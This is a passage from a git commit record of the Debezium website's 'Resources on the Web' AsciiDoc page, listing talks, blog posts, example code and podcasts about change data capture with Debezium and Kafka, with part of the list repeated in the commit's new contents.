https:\/\/www.slideshare.net\/nfrankel\/london-inmemory-computing-meetup-a-changedatacapture-usecase-designing-an-evergreen-cache[\"A Change-Data-Capture use-case: designing an evergreen cache\"] by Nicolas Fr\u00e4nkel\n* https:\/\/www.youtube.com\/watch?v=6nU9i022yeY[\"Microservices & Data: Implementing the Outbox Pattern with Debezium\"] by Thorben Janssen\n* \"Practical Change Data Streaming Use Cases With Apache Kafka and Debezium\" (https:\/\/www.infoq.com\/presentations\/data-streaming-kafka-debezium\/[recording], https:\/\/speakerdeck.com\/gunnarmorling\/practical-change-data-streaming-use-cases-with-apache-kafka-and-debezium-qcon-san-francisco-2019[slides]) by Gunnar Morling; QCon San Francisco 2019; JokerConf St. 
Petersburg 2019\n* https:\/\/speakerdeck.com\/jbfletch\/using-kafka-to-discover-events-hidden-in-your-database[\"Using Kafka to Discover Events Hidden in your Database\"] by Anna McDonald; Kafka Summit San Francisco 2019\n* https:\/\/databricks.com\/session_eu19\/modern-etl-pipelines-with-change-data-capture[\"Modern ETL Pipelines with Change Data Capture\"] by Thiago Rigo and David Mariassy; Spark and AI Summit Europe 2019\n* https:\/\/www.infoq.com\/news\/2019\/04\/change-data-capture-debezium\/[\"Creating Events from Databases Using Change Data Capture: Gunnar Morling at MicroXchg Berlin\"] by Jan Stenberg; a session report from MicroXchg\n* https:\/\/developers.redhat.com\/videos\/youtube\/QYbXDp4Vu-8\/[\"Change Data Streaming Patterns for Microservices With Debezium\"] by Gunnar Morling; 30 min webinar with live demo, February 2019\n* https:\/\/www.slideshare.net\/MikeFowler28\/migrating-with-debezium[\"Migrating with Debezium\"] by Mike Fowler; London PostgreSQL Meetup, January 2019\n* \"The Why's and How's of Database Streaming\" by Joy Gao (https:\/\/www.infoq.com\/presentations\/wepay-database-streaming[recording], https:\/\/qconsf.com\/system\/files\/presentation-slides\/whys_and_hows_of_database_streaming_final.pdf[slides]), QCon San Francisco, 2018\n* \"Change Data Streaming Patterns for Microservices With Debezium\" by Gunnar Morling (https:\/\/www.youtube.com\/watch?v=NawsloOoFo0[video recording], https:\/\/speakerdeck.com\/gunnarmorling\/data-streaming-for-microservices-using-debezium[slides]), Voxxed Microservices Paris 2018; https:\/\/www.confluent.io\/kafka-summit-sf18\/change-data-streaming-patterns-for-microservices-with-debezium[recording and slides] from Kafka Summit San Francisco 2018\n* https:\/\/speakerdeck.com\/rk3rn3r\/i-need-my-data-and-a-little-bit-of-your-data-dot-integrating-services-with-apache-kafka-confluent-streaming-event-munich[\"I need my data and a little bit of your data.\" - Integrating services with Apache Kafka] by https:\/\/twitter.com\/rk3rn3r\/[Ren\u00e9 Kerner]; Confluent Streaming Event Munich 2018\n* https:\/\/aiven.io\/assets\/img\/blog\/zalando-kafka-cdc-presentation.pdf[\"PG Change Data Capture with Debezium\"] by Hannu Valtonen; Kafka Meetup Helsinki 2018\n* https:\/\/de.slideshare.net\/FrankLyaruu\/embracing-database-diversity-with-kafka-and-debezium[\"Embracing Database Diversity with Kafka and Debezium\"] by Frank Lyaruu; VoxxedDays Vienna 2018\n* https:\/\/speakerdeck.com\/japoneizo\/syncing-data-between-microservices-using-debezium-and-apache-kafka[\"Syncing data between microservices using Debezium and Apache Kafka\"] by Eizo Nishime; The Developer's Conference S\u00e3o Paulo 2018\n* https:\/\/www.slideshare.net\/kgwap\/kafka-connect-debezium?ref=http:\/\/kasundon.com\/2018\/07\/08\/streaming-mysql-change-sets-to-kafka-aws-kinesis\/[\"Kafka Connect - Debezium; Stream MySQL Events to Kafka\"] by Kasun Don; 2018\n* \"Streaming Database Changes with Debezium\" by Gunnar Morling (https:\/\/www.youtube.com\/watch?v=IOZ2Um6e430[Video recording] from Devoxx 2017; https:\/\/speakerdeck.com\/gunnarmorling\/data-streaming-for-microservices-using-debezium[Slides] from RivieraDev 2018)\n* https:\/\/speakerdeck.com\/xenji\/kafka-and-debezium-at-trivago-code-dot-talks-2017-edition\"[\"Kafka and Debezium at trivago\"] by https:\/\/twitter.com\/xenji\/[Mario M\u00fcller] and https:\/\/twitter.com\/rk3rn3r\/[Ren\u00e9 Kerner]; Code.Talks 2017\n* https:\/\/vimeo.com\/168409093[\"Event Sourcing with Debezium and Kafka\"] by Christian Posta; 
2016\n\n== Blog Posts & Articles\n\n* https:\/\/medium.com\/incognia-tech\/ensuring-data-consistency-across-services-with-the-transactional-outbox-pattern-90be4d735cb0[\"Ensuring data consistency across services with the Transactional Outbox pattern\"] by Mateus Moury and Rafael Acevedo\n* https:\/\/medium.com\/swlh\/data-liberation-pattern-using-debezium-engine-4fd32b92d826[\"Data liberation pattern using the Debezium engine\"] by Samuel Vandecasteele\n* https:\/\/medium.com\/event-driven-utopia\/a-gentle-introduction-to-event-driven-change-data-capture-683297625f9b[\"A Gentle Introduction to Event-driven Change Data Capture\"] by Dunith Dhanushka\n* https:\/\/maciejszymczyk.medium.com\/change-data-capture-convert-your-database-into-a-stream-with-debezium-356c1a49b459[\"Change Data Capture \u2014 Convert your database into a stream with Debezium\"] by Maciej Szymczyk\n* https:\/\/info.crunchydata.com\/blog\/postgres-change-data-capture-with-debezium[\"Change Data Capture in Postgres With Debezium\"] by Dave Cramer\n* https:\/\/medium.com\/apache-pinot-developer-blog\/change-data-analysis-with-debezium-and-apache-pinot-b4093dc178a7[\"Change Data Analysis with Debezium and Apache Pinot\"] by Kenny Bastani\n* https:\/\/juliuskrah.com\/blog\/2020\/01\/06\/streaming-changes-from-keycloak-using-debezium-cdc\/[\"Streaming Changes from Keycloak using Debezium (CDC)\"] by Julius Krah\n* https:\/\/www.tigeranalytics.com\/blog\/building-nrt-data-pipeline-debezium-kafka-snowflake\/[\"Building a Near-Real Time (NRT) Data Pipeline using Debezium, Kafka, and Snowflake\"] by Arun Kumar Ponnurangam and Karunakar Goud\n* https:\/\/medium.com\/data-rocks\/creating-a-no-code-aws-native-oltp-to-olap-data-pipeline-part-1-50481b57dc30[\"Creating a no-code AWS native OLTP to OLAP data pipeline \u2014 Part 1\"] by Haris Michailidis\n* https:\/\/www.zuehlke.com\/en\/insights\/design-failure-distributed-transactions-microservices[\"Design for Failure \u2014 Distributed Transactions in Microservices\"] by Darren Boo\n* https:\/\/blog.rafaelgss.com.br\/autonomous-microservices[\"Autonomous Microservices - Outbox Pattern\"] by Rafael Gonzaga\n* https:\/\/medium.com\/trendyol-tech\/debezium-with-simple-message-transformation-smt-4f5a80c85358[\"Debezium with Simple Message Transformation (SMT)\"] by Okan Yildirim\n* https:\/\/www.systemcraftsman.com\/2020\/11\/30\/asap-the-storified-demo-of-introduction-to-debezium-and-kafka-on-kubernetes\/[\"ASAP! 
\u2013 The Storified Demo of Introduction to Debezium and Kafka on Kubernetes\"] by Aykut Bulgu\n* https:\/\/elephanttamer.net\/?p=50[\"Setting up PostgreSQL for Debezium\"] by Micha\u0142 Mackiewicz\n* https:\/\/medium.com\/@midhunsukumaran.mec\/a-year-and-a-half-with-debezium-f4f323b4909d[\"A year and a half with Debezium: CDC With MySQL\"] by Midhun Sukumaran\n* https:\/\/jet-start.sh\/blog\/2020\/10\/06\/enabling-full-text-search[\"Enabling Full-text Search with Change Data Capture in a Legacy Application\"] by Franti\u0161ek Hartman\n* https:\/\/medium.com\/@sumant.rana\/sync-mysql-to-postgresql-using-debezium-and-kafkaconnect-d6612489fd64[\"Sync MySQL to PostgreSQL using Debezium and Kafka Connect\"] by Sumant Rana\n* https:\/\/turkogluc.com\/postgresql-capture-data-change-with-debezium\/[\"Making Sense of Change Data Capture Pipelines for Postgres with Debezium Kafka Connector\"] by Cemal Turkoglu\n* https:\/\/developers.redhat.com\/cheat-sheets\/debezium-openshift-cheat-sheet[\"Debezium on OpenShift Cheat Sheet\"] by Abdellatif Bouchama\n* https:\/\/medium.com\/data-rocks\/managing-kafka-connectors-at-scale-using-kafka-connect-manager-kcm-31d887de033c[\"Managing Kafka Connectors at scale using Kafka Connect Manager\"] by Sandeep Mehta\n* https:\/\/medium.com\/dana-engineering\/streaming-data-changes-in-mysql-into-elasticsearch-using-debezium-kafka-and-confluent-jdbc-sink-8890ad221ccf[\"How to stream data changes from MySQL into Elasticsearch using Debezium\"] by Rizqi Nugroho\n* https:\/\/medium.com\/@changeant\/implementing-the-transactional-outbox-pattern-with-debezium-in-quarkus-f2680306951[\"Implementing the Transactional Outbox pattern with Debezium in Quarkus\"] by Iain Porter\n* https:\/\/www.confluent.io\/blog\/cdc-and-streaming-analytics-using-debezium-kafka\/[\"Analysing Changes with Debezium and Kafka Streams\"] by Mike Fowler\n* https:\/\/medium.com\/@bogdan.dina03\/de-coupling-yourself-507a15fa100d[\"(De)coupling yourself\"] by Dina Bogdan\n* https:\/\/medium.com\/comsystoreply\/stream-your-database-into-kafka-with-debezium-a94b2f649664[\"Stream Your Database into Kafka with Debezium -- An Introduction and Experience Report\"] by David Hettler\n* https:\/\/medium.com\/@limadelrey\/kafka-connect-how-to-create-a-real-time-data-pipeline-using-change-data-capture-cdc-c60e06e5306a[\"Kafka Connect: How to create a real time data pipeline using Change Data Capture (CDC)\"] by Francisco Lima\n* https:\/\/dev.to\/abhirockzz\/tutorial-set-up-a-change-data-capture-architecture-on-azure-using-debezium-postgres-and-kafka-49h6[\"Tutorial: Set up a Change Data Capture architecture on Azure using Debezium, Postgres and Kafka \"] by Abhishek Gupta\n* Kafka Connect \u2013 Offset commit errors by Javier Holguera: https:\/\/www.javierholguera.com\/2020\/06\/02\/kafka-connect-offset-commit-errors-i\/[Part 1], https:\/\/www.javierholguera.com\/2020\/06\/16\/kafka-connect-offset-commit-errors-ii\/[Part 2]\n* https:\/\/medium.com\/@samuel_vdc\/data-liberation-pattern-using-debezium-engine-4fd32b92d826[\"Data liberation pattern using the Debezium engine\"] by Samuel Vandecasteele\n* https:\/\/medium.com\/hepsiburadatech\/postgresql-db-change-data-capture-cdc-using-debezium-f1a933174fd8[\"PostgreSql Db Change Data Capture (CDC) Using Debezium\"] by Caner Tosuner\n* http:\/\/www.mastertheboss.com\/jboss-frameworks\/debezium\/getting-started-with-debezium[\"Getting started with Debezium\"] by Francesco Marchioni\n* 
https:\/\/dev.to\/oryanmoshe\/debezium-custom-converters-timestampconverter-26hh[\"Debezium Custom Converters - TimestampConverter\"] by Oryan Moshe\n* https:\/\/www.gridgain.com\/resources\/blog\/change-data-capture-between-mysql-and-gridgain-debezium[\"Change Data Capture Between MySQL and GridGain With Debezium\"] by Evgenii Zhuravlev\n* https:\/\/cloud.google.com\/blog\/products\/data-analytics\/how-to-move-data-from-mysql-to-bigquery[\"How do I move data from MySQL to BigQuery?\"], discussing usage of the Debezium embedded engine with Google Cloud Dataflow, by Pablo Estrada and Griselda Cuevas\n* https:\/\/medium.com\/everything-full-stack\/streaming-data-changes-to-a-data-lake-with-debezium-and-delta-lake-pipeline-299821053dc3[\"Streaming data changes to a Data Lake with Debezium and Delta Lake pipeline\"] by Yinon D. Nahamu\n* https:\/\/www.infoq.com\/news\/2020\/01\/cdc-debezium-1-0-final-released\/[\"Change Data Capture Tool Debezium 1.0 Final Released\"] by Jan Stenberg\n* https:\/\/strimzi.io\/2020\/01\/27\/deploying-debezium-with-kafkaconnector-resource.html[\"Deploying Debezium using the new KafkaConnector resource\"] by Tom Bentley\n* https:\/\/www.sderosiaux.com\/articles\/2020\/01\/06\/learnings-from-using-kafka-connect-debezium-postgresql\/[\"Learnings from using Kafka Connect - Debezium - PostgreSQL\"] by St\u00e9phane Derosiaux\n* https:\/\/thedataguy.in\/monitor-debezium-mysql-connector-with-prometheus-and-grafana\/[\"Monitor Debezium MySQL Connector With Prometheus And Grafana\"] by Bhuvanesh\n* http:\/\/www.carbonrider.com\/2019\/11\/16\/change-data-capture-with-apache-kafka-postgresql-kafka-connect-and-debezium\/[\"Change Data Capture with Apache Kafka, PostgreSQL, Kafka Connect and Debezium\"] by Yogesh Jadhav\n* https:\/\/dzone.com\/articles\/implementing-the-outbox-pattern[\"Implementing the Outbox Pattern\"] by Sohan Ganapathy\n* https:\/\/medium.com\/engineering-varo\/event-driven-architecture-and-the-outbox-pattern-569e6fba7216[\"Event-Driven Architecture and the Outbox Pattern\"] by Rod Shokrian\n* https:\/\/medium.com\/convoy-tech\/logs-offsets-near-real-time-elt-with-apache-kafka-snowflake-473da1e4d776[\"Logs & Offsets: (Near) Real Time ELT with Apache Kafka + Snowflake\"] by Adrian Kreuziger\n* https:\/\/info.crunchydata.com\/blog\/postgresql-change-data-capture-with-debezium[\"PostgreSQL Change Data Capture With Debezium\"] by Dave Cramer\n* https:\/\/developers.redhat.com\/blog\/2019\/09\/03\/cdc-pipeline-with-red-hat-amq-streams-and-red-hat-fuse\/[\"CDC pipeline with Red Hat AMQ Streams and Red Hat Fuse\"] by Sadhana Nandakumar\n* https:\/\/medium.com\/@hpgrahsl\/communicating-data-changes-across-service-boundaries-safely-129c4eb5db8[\"Communicating Data Changes Across Service Boundaries\u2026 Safely!\"] by Hans-Peter Grahsl\n* https:\/\/blog.clairvoyantsoft.com\/mysql-cdc-with-apache-kafka-and-debezium-3d45c00762e4[\"MySQL CDC with Apache Kafka and Debezium\"] by Kushal Yellam\n* https:\/\/thoughts-on-java.org\/outbox-pattern-with-cdc-and-debezium\/[\"Implementing the Outbox Pattern with CDC using Debezium\"] by Thorben Janssen\n* https:\/\/blog.zhaw.ch\/splab\/2019\/05\/03\/serverless-plumbing-streaming-mysql-events-to-knative-services\/[\"Serverless Plumbing: Streaming MySQL Events to Knative Services\"] by Mohammed Al-Ameen\n* https:\/\/medium.com\/yotpoengineering\/building-zero-latency-data-lake-using-change-data-capture-f93ef50eb066[\"Building zero-latency data lake using Change Data Capture\"] by Ofir Ventura\n* 
https:\/\/medium.com\/high-alpha\/data-stream-processing-for-newbies-with-kafka-ksql-and-postgres-c30309cfaaf8[\"Data Stream Processing for Newbies with Kafka, KSQL, and Postgres\"] by Maria Patterson\n* https:\/\/blog.couchbase.com\/kafka-connect-mysql-couchbase-debezium\/[\"Kafka Connect from MySQL to Couchbase with Debezium\"] by Matthew Groves\n* https:\/\/www.linkedin.com\/pulse\/change-data-capture-postgresql-via-debezium-part-1-paolo-scarpino\/[\"Change Data Capture on PostgreSQL via Debezium\"] by Paolo Scarpino\n* https:\/\/medium.com\/jw-player-engineering\/southpaw-176aea5f4583[\"Southpaw - Streaming Left Joins with Change Data Capture\"] by Morrigan Jones\n* https:\/\/medium.com\/@hpgrahsl\/connecting-apache-kafka-to-azure-cosmosdb-part-ii-b96cf0f5cdfa[\"Connecting Apache Kafka to Azure CosmosDB\u200a\u2014\u200aPart II\"] by Hans-Peter Grahsl\n* https:\/\/vladmihalcea.com\/how-to-extract-change-data-events-from-mysql-to-kafka-using-debezium\/[\"How to extract change data events from MySQL to Kafka using Debezium\"] by Vlad Mihalcea\n* https:\/\/rmoff.net\/2019\/10\/16\/using-kafka-connect-and-debezium-with-confluent-cloud\/[\"Using Kafka Connect and Debezium with Confluent Cloud\"]\n* https:\/\/rmoff.net\/2019\/11\/20\/streaming-data-from-sql-server-to-kafka-to-snowflake-with-kafka-connect\/[\"Streaming data from SQL Server to Kafka to Snowflake \u2744\ufe0f with Kafka Connect and Debezium\"]\n* https:\/\/rmoff.net\/2018\/03\/24\/streaming-data-from-mysql-into-kafka-with-kafka-connect-and-debezium\/[\"Streaming Data from MySQL into Kafka with Kafka Connect and Debezium\"] by Robin Moffatt\n* https:\/\/rmoff.net\/2018\/03\/27\/streaming-data-from-mongodb-into-kafka-with-kafka-connect-and-debezium\/[\"Streaming Data from MongoDB into Kafka with Kafka Connect and Debezium\"] by Robin Moffatt\n* https:\/\/medium.com\/@tilakpatidar\/streaming-data-from-postgresql-to-kafka-using-debezium-a14a2644906d[\"Streaming data from PostgreSQL to Kafka using Debezium\"] by Tilak Patidar\n* https:\/\/medium.com\/blablacar-tech\/streaming-data-out-of-the-monolith-building-a-highly-reliable-cdc-stack-d71599131acb[\"Streaming Data out of the Monolith: Building a Highly Reliable CDC Stack\"] by Yuancheng Peng\n* https:\/\/iamninad.com\/how-debezium-kafka-stream-can-help-you-write-cdc\/[\"How Debezium & Kafka Streams Can Help You Write CDC Solution\"] by Neenad Ingole\n* https:\/\/jakubbujny.com\/2018\/09\/20\/replicate-cloud-aws-rds-mysql-to-on-premise-postgresql-in-docker-future-is-today-debezium-and-kafka-on-aws-eks\/[Replicate cloud AWS RDS MySQL to on-premise PostgreSQL in Docker \u2013 future is today! 
Debezium and Kafka on AWS EKS] by Jakub Bujny\n* https:\/\/medium.com\/@mauridb\/sql-server-change-stream-b204c0892641[\"SQL Server Change Stream - Responding to data changes in real time using modern technologies\"]\n* https:\/\/medium.com\/@hpgrahsl\/optimizing-read-access-to-sharded-mongodb-collections-utilizing-apache-kafka-connect-cdcd8ec6228[\"Optimizing Read Access to Sharded MongoDB Collections utilizing Apache Kafka Connect\"] by Hans-Peter Grahsl\n\n== Example Code\n\n* https:\/\/github.com\/debezium\/debezium-examples\/[Debezium's official examples]\n* https:\/\/ibm-cloud-architecture.github.io\/refarch-eda\/use-cases\/db2-debezium\/[DB2 Change Data Capture with Debezium]\n* https:\/\/github.com\/yorek\/debezium-sql-change-stream[\"SQL Server Change Stream sample using Debezium\"] by Davide Mauri\n* https:\/\/github.com\/foogaro\/change-data-capture[\"CDC project based on Debezium, Kafka, MS SQL Server, Infinispan and Teiid, entirely based on containers\"] by Luigi Fugaro\n* https:\/\/github.com\/fvaleri\/cdc[\"CDC with Camel and Debezium: code-driven vs configuration-driven pipelines\"] by Federico Valeri\n* https:\/\/github.com\/morsapaes\/flink-sql-CDC[\"Change Data Capture with Flink SQL and Debezium\"] by Marta Paes\n* https:\/\/github.com\/suadev\/microservices-change-data-capture-with-debezium[\"Microservices Change Data Capture With Debezium\"] by Suat K\u00f6se\n\n== Interviews and Podcasts\n\n* https:\/\/www.dataengineeringpodcast.com\/debezium-change-data-capture-episode-114\/[Change Data Capture For All Of Your Databases With Debezium -- episode #114 of the Data Engineering Podcast by Tobias Macey, together with Randall Hauch]\n* https:\/\/www.buzzsprout.com\/186154\/1770184[MySQL, Cassandra, BigQuery, and Streaming Analytics with Joy Gao]\n* http:\/\/airhacks.fm\/#episode_57[CDC, Debezium, streaming and Apache Kafka -- episode #57 of Adam Bien's airhacks.fm podcast]\n* https:\/\/www.buzzsprout.com\/186154\/1365043-change-data-capture-with-debezium-ft-gunnar-morling[Change Data Capture with Debezium ft. 
Gunnar Morling]\n* https:\/\/www.youtube.com\/watch?v=H-yGdKy48VE[Interview with Gunnar Morling] for thoughts-on-java.org\n\n== Other\n\n* https:\/\/www.thoughtworks.com\/radar\/platforms\/debezium[Debezium entry in the ThoughtWorks Technology Radar]\n* https:\/\/learn.openshift.com\/middleware\/debezium-getting-started\/[Getting Started with Debezium on OpenShift]; interactive Debezium learning scenario allowing you to try out Debezium on OpenShift within minutes\n\n== Non-English Resources\n\n* \ud83c\udde9\ud83c\uddea https:\/\/blogs.zeiss.com\/digital-innovation\/de\/datenbankaenderungen-teil-1\/[Datenbank\u00e4nderungen erkennen und streamen mit Debezium und Apache Kafka (Teil 1) \u2013 Die Theorie] (blog post, German)\n* \ud83c\uddf5\ud83c\uddf1 https:\/\/wiadrodanych.pl\/big-data\/change-data-capture-mysql-debezium\/[Change Data Capture \u2013 Zmie\u0144 Baz\u0119 W Strumie\u0144 (Debezium)] by Maciej Szymczyk (blog post, Polish)\n* \ud83c\uddf7\ud83c\uddfa https:\/\/habr.com\/ru\/company\/flant\/blog\/523510\/[\u0417\u043d\u0430\u043a\u043e\u043c\u0441\u0442\u0432\u043e \u0441 Debezium \u2014 CDC \u0434\u043b\u044f Apache Kafka] (blog post, Russian)\n* \ud83c\udde8\ud83c\uddf3 https:\/\/mp.weixin.qq.com\/s\/Mfn-fFegb5wzI8BIHhNGvQ[\"Flink SQL CDC \u4e0a\u7ebf\uff01\u6211\u4eec\u603b\u7ed3\u4e86 13 \u6761\u751f\u4ea7\u5b9e\u8df5\u7ecf\u9a8c\"] by Zeng Qingdong (blog post, Mandarin)\n* \ud83c\udde7\ud83c\uddf7 https:\/\/medium.com\/@viavarejo.productdevelopment\/uma-estrat%C3%A9gia-de-cdc-com-debezium-e27aa945d7b0[\"Uma estrat\u00e9gia de CDC com Debezium\"] by Jo\u00e3o Gabriel Mello, Brunno Lira and Marcelo Costa (blog post, Portuguese)\n* \ud83c\udde7\ud83c\uddf7 https:\/\/www.infoq.com\/br\/presentations\/postgresql-ao-datalake-utilizando-kafkadebezium\/[Do PostgreSQL ao Data Lake utilizando Kafka-Debezium] by Paulo Singaretti, PGConf S\u00e3o Paulo 2019 (conference session recording, Portuguese)\n* \ud83c\udde7\ud83c\uddf7 https:\/\/www.youtube.com\/watch?v=jtVD-HIJG9M&feature=youtu.be[Quarkus #25: Monitoramento de qualquer opera\u00e7\u00e3o em uma tabela do banco de dados com Debezium] by Vinicius Ferraz (screen cast, Portuguese)\n* \ud83c\udde7\ud83c\uddf7 https:\/\/elo7.dev\/cdc-parte-1\/[\"Introdu\u00e7\u00e3o ao Change Data Capture (CDC)\"] by Renato Sardinha (blog post, Portuguese)\n* \ud83c\udde7\ud83c\uddf7 https:\/\/medium.com\/@singaretti\/streaming-de-dados-do-postgresql-utilizando-kafka-debezium-v2-d49f46d70b37[\"Streaming de dados (do PostgreSQL) utilizando Kafka|Debezium (v2)\"] by Paulo Singaretti (blog post, Portuguese)\n* \ud83c\uddeb\ud83c\uddf7 https:\/\/www.synaltic.fr\/blog\/conference-poss-11-12-2019\/[Conf\u00e9rence POSS 2019 : Streaming Processing avec Debezium] by Yabir Canario De la Mota & Charly Clairmont (blog post, French)\n* \ud83c\udde9\ud83c\uddea https:\/\/www.heise.de\/developer\/artikel\/Im-Gespraech-Gunnar-Morling-ueber-Debezium-und-CDC-4513865.html[Im Gespr\u00e4ch: Gunnar Morling \u00fcber Debezium und CDC]; interview with Thorben Janssen for heise.de (podcast, German)\n* \ud83c\uddee\ud83c\udde9 https:\/\/medium.com\/easyread\/ingest-data-dari-mysql-database-ke-bigquery-dengan-apache-kafka-dan-debezium-f519e197f39c[\"Ingesting Data dari MySQL Database ke BigQuery dengan Apache Kafka dan Debezium\"] by Ilyas Ahsan (blog post, Indonesian)\n* \ud83c\uddef\ud83c\uddf5 https:\/\/rheb.hatenablog.com\/entry\/2020\/02\/19\/debezium-camel-integration\/[Debezium\u3068Apache 
Camel\u306e\u30a4\u30f3\u30c6\u30b0\u30ec\u30fc\u30b7\u30e7\u30f3\u30b7\u30ca\u30ea\u30aa] (Japanese translation of the blog post link:\/blog\/2020\/02\/19\/debezium-camel-integration\/[Integration Scenarios with Debezium and Apache Camel] by Jiri Pechanec)\n* \ud83c\uddef\ud83c\uddf5 https:\/\/rheb.hatenablog.com\/entry\/2020\/02\/10\/event-sourcing-vs-cdc\/[\u30de\u30a4\u30af\u30ed\u30b5\u30fc\u30d3\u30b9\u306e\u305f\u3081\u306e\u5206\u6563\u30c7\u30fc\u30bf \u301c \u30a4\u30d9\u30f3\u30c8\u30bd\u30fc\u30b7\u30f3\u30b0 vs \u30c1\u30a7\u30f3\u30b8\u30c7\u30fc\u30bf\u30ad\u30e3\u30d7\u30c1\u30e3] (Japanese translation of the blog post link:\/blog\/2020\/02\/10\/event-sourcing-vs-cdc\/[Distributed Data for Microservices \u2014 Event Sourcing vs. Change Data Capture] by Eric Murphy)\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e462f753d264f97fb0d1a64b52f7fcec0b675875","subject":"Update online-resources.asciidoc","message":"Update online-resources.asciidoc","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"documentation\/online-resources.asciidoc","new_file":"documentation\/online-resources.asciidoc","new_contents":"---\nlayout: page-menu\ntitle: Resources on the Web\npermalink: \/documentation\/online-resources\/\n---\n:linkattrs:\n:icons: font\n:source-highlighter: highlight.js\n\nA compilation of blog posts, slide sets, recordings and other online resources around Debezium.\nMost of the resources are in English; you can find a collection of link:#non_english_resources[resources in other languages] like Portuguese or French towards the end of this page.\n\nYou've written or spoken about Debezium and would like to have your post or talk listed here?\nThat's great, let us know by sharing the link in our https:\/\/groups.google.com\/forum\/#!forum\/debezium[forum].\nOr better yet, just add the link to the https:\/\/github.com\/debezium\/debezium.github.io\/blob\/develop\/docs\/online-resources.asciidoc[source of this page] yourself and send a pull request against the https:\/\/github.com\/debezium\/debezium.github.io[debezium.github.io] repo.\nThanks!\n\n== Presentations, Session Recordings and Videos\n\n* https:\/\/www.youtube.com\/watch?v=_jy0VmpdSu4[\"DevOps Malaysia Online Meetup #32 : Using Debezium for Microservices Outbox Pattern\"] by CK Gan\n* https:\/\/www.youtube.com\/watch?v=yWFFOkWlLoY[\"Analyzing Real-time Order Deliveries using CDC with Debezium and Pinot\"] by Kenny Bastani and Gunnar Morling\n* https:\/\/www.youtube.com\/watch?v=R1kOuvLYcYo[\"Dissecting our Legacy: The Strangler Fig Pattern with Apache Kafka, Debezium and MongoDB\"] by Hans-Peter Grahsl and Gunnar Morling\n* https:\/\/2021.berlinbuzzwords.de\/session\/change-data-streaming-patterns-distributed-systems[\"Change Data Streaming Patterns in Distributed Systems\"] by Gunnar Morling and Hans-Peter Grahsl\n* link:++https:\/\/static.sched.com\/hosted_files\/ossna2020\/c6\/Managing Data Consistency with Debezium.pdf++[\"Managing Data Consistency Among Microservices with Debezium\"] by Justin Chao\n* https:\/\/noti.st\/morsapaes\/liQzgs\/change-data-capture-with-flink-sql-and-debezium[\"Change Data Capture with Flink SQL and Debezium\"] by Marta Paes\n* https:\/\/www.youtube.com\/watch?v=DJTtGaPsSYY[\"Quarkus Insights #10: CDC, Debezium and the outbox pattern\"]; a live-streamed session with the Quarkus team on Debezium and the outbox pattern, including a demo\n* 
https:\/\/www.slideshare.net\/nfrankel\/london-inmemory-computing-meetup-a-changedatacapture-usecase-designing-an-evergreen-cache[\"A Change-Data-Capture use-case: designing an evergreen cache\"] by Nicolas Fr\u00e4nkel\n* https:\/\/www.youtube.com\/watch?v=6nU9i022yeY[\"Microservices & Data: Implementing the Outbox Pattern with Debezium\"] by Thorben Janssen\n* \"Practical Change Data Streaming Use Cases With Apache Kafka and Debezium\" (https:\/\/www.infoq.com\/presentations\/data-streaming-kafka-debezium\/[recording], https:\/\/speakerdeck.com\/gunnarmorling\/practical-change-data-streaming-use-cases-with-apache-kafka-and-debezium-qcon-san-francisco-2019[slides]) by Gunnar Morling; QCon San Francisco 2019; JokerConf St. Petersburg 2019\n* https:\/\/speakerdeck.com\/jbfletch\/using-kafka-to-discover-events-hidden-in-your-database[\"Using Kafka to Discover Events Hidden in your Database\"] by Anna McDonald; Kafka Summit San Francisco 2019\n* https:\/\/databricks.com\/session_eu19\/modern-etl-pipelines-with-change-data-capture[\"Modern ETL Pipelines with Change Data Capture\"] by Thiago Rigo and David Mariassy; Spark and AI Summit Europe 2019\n* https:\/\/www.infoq.com\/news\/2019\/04\/change-data-capture-debezium\/[\"Creating Events from Databases Using Change Data Capture: Gunnar Morling at MicroXchg Berlin\"] by Jan Stenberg; a session report from MicroXchg\n* https:\/\/developers.redhat.com\/videos\/youtube\/QYbXDp4Vu-8\/[\"Change Data Streaming Patterns for Microservices With Debezium\"] by Gunnar Morling; 30 min webinar with live demo, February 2019\n* https:\/\/www.slideshare.net\/MikeFowler28\/migrating-with-debezium[\"Migrating with Debezium\"] by Mike Fowler; London PostgreSQL Meetup, January 2019\n* \"The Why's and How's of Database Streaming\" by Joy Gao (https:\/\/www.infoq.com\/presentations\/wepay-database-streaming[recording], https:\/\/qconsf.com\/system\/files\/presentation-slides\/whys_and_hows_of_database_streaming_final.pdf[slides]), QCon San Francisco, 2018\n* \"Change Data Streaming Patterns for Microservices With Debezium\" by Gunnar Morling (https:\/\/www.youtube.com\/watch?v=NawsloOoFo0[video recording], https:\/\/speakerdeck.com\/gunnarmorling\/data-streaming-for-microservices-using-debezium[slides]), Voxxed Microservices Paris 2018; https:\/\/www.confluent.io\/kafka-summit-sf18\/change-data-streaming-patterns-for-microservices-with-debezium[recording and slides] from Kafka Summit San Francisco 2018\n* https:\/\/speakerdeck.com\/rk3rn3r\/i-need-my-data-and-a-little-bit-of-your-data-dot-integrating-services-with-apache-kafka-confluent-streaming-event-munich[\"I need my data and a little bit of your data.\" - Integrating services with Apache Kafka] by https:\/\/twitter.com\/rk3rn3r\/[Ren\u00e9 Kerner]; Confluent Streaming Event Munich 2018\n* https:\/\/aiven.io\/assets\/img\/blog\/zalando-kafka-cdc-presentation.pdf[\"PG Change Data Capture with Debezium\"] by Hannu Valtonen; Kafka Meetup Helsinki 2018\n* https:\/\/de.slideshare.net\/FrankLyaruu\/embracing-database-diversity-with-kafka-and-debezium[\"Embracing Database Diversity with Kafka and Debezium\"] by Frank Lyaruu; VoxxedDays Vienna 2018\n* https:\/\/speakerdeck.com\/japoneizo\/syncing-data-between-microservices-using-debezium-and-apache-kafka[\"Syncing data between microservices using Debezium and Apache Kafka\"] by Eizo Nishime; The Developer's Conference S\u00e3o Paulo 2018\n* 
